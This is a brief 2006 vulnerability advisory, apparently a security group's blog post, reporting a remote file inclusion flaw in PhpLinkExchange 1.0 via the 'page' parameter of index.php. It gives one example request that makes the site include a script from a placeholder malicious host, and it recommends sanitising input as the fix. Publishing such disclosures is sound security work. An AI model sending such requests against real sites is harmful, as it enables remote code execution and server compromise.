by r0t,der4444,cembo,VietMafia

Thursday, July 20, 2006

PhpLinkExchange remote File Inclusion Vuln.

###############################################
Vuln. discovered by : r0t
Date: 20 july 2006
vendor:www.idevspot.com/PhpLinkExchange.php
affected versions: 1.0 and prior
###############################################

Vulnerability Description:

PhpLinkExchange contains a flaw that allows a remote file inclusion,which can be exploited by malicious people to compromise a vulnerable system.
User input passed to the "page" parameter in "index.php" isn't properly verified before being used to include files. This can be exploited to include scripts from external resources by passing an URL to a remote site.

example:

http://[victim]/index.php?page=http://[malicious_site]/file

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

0 Comments:

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew